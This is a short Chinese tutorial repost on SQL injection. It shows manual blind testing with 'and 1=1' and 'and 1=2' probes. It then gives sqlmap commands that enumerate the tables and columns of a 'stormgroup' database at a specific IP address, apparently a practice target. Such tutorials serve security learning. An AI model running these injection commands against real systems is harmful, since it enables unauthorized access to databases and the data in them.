目录1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。2.现在拿出我们的kali工具,sqlmap进行注入测试。3.可以看到存在注入漏洞,扫到了5个数据
地址栏输入 and 1=1 发现页面正常显示。
再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns
本篇文章就到这里了,希望能给你带来帮助,也希望您能够多多关注编程网的更多内容!
--结束END--
本文标题: sqlmap注入图文详解
本文链接: https://www.lsjlt.com/news/132347.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
下载Word文档到电脑,方便收藏和打印~
2024-03-01
2024-03-01
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0